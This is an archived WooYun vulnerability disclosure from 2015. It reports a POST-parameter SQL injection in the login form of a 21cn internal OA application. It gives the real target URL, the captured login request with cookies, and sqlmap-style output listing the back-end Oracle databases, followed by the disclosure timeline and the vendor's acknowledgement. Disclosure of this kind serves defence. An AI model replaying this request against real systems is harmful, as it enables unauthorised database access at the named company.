破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

21cn某内部应用post注入

编号134520
Urlhttp://www.wooyun.org/bug.php?action=view&id=134520
漏洞状态厂商已经确认
漏洞标题21cn某内部应用post注入
漏洞类型SQL注射漏洞
厂商世纪龙信息网络有限责任公司
白帽子路人甲
提交日期2015-08-16 19:43:00
公开日期2015-10-01 09:04:00
修复时间(not set)
确认时间2015-08-17 00:00:00
Confirm Spend1
漏洞标签数据库账户权限过高 字符类型注射 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
。。。。。。。
漏洞细节

漏洞网站:http://oa.21cn.com:9090/login.do?message=110&verify=
post信息:

POST /verifyLogin.do HTTP/1.1
Host: oa.21cn.com:9090
Proxy-Connection: keep-alive
Content-Length: 100
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.21cn.com:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.21cn.com:9090/login.do?message=181&verify=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=abcs7A6VY_Qq48PNnX08u; _wa_pk_cookie=2084062502; _wa_session_cookie=1439701476000-1738009137; Hm_lvt_e21591a86ad5bdefc142cd749c6c9ef6=1439701; Hm_lpvt_e21591a86ad5bdefc142cd749c6c9ef6=1439701477; testBanCookie=test
loginid=aaa%4021cn.com&password=aaaaaa&clienttype=Webclient&clientver=4.5&language=&country=&verify=


1.png


2.png


POC

available databases [19]:
[*] APEX_AA02A0
[*] BPPaOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOXSaFaLES
[*] MDSYS
[*] OLQPSYS
[*] ORDSYS
[*] OUQQCTA
[*] OUTLN
[*] OWBTZT
[*] QCOLOGY
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTQQ
[*] WMSaS
[*] XDB


修复方案

状态信息 2015-08-16: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开
厂商回复感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢。
回应信息危害等级:高漏洞Rank:15 确认时间:2015-08-17 09:02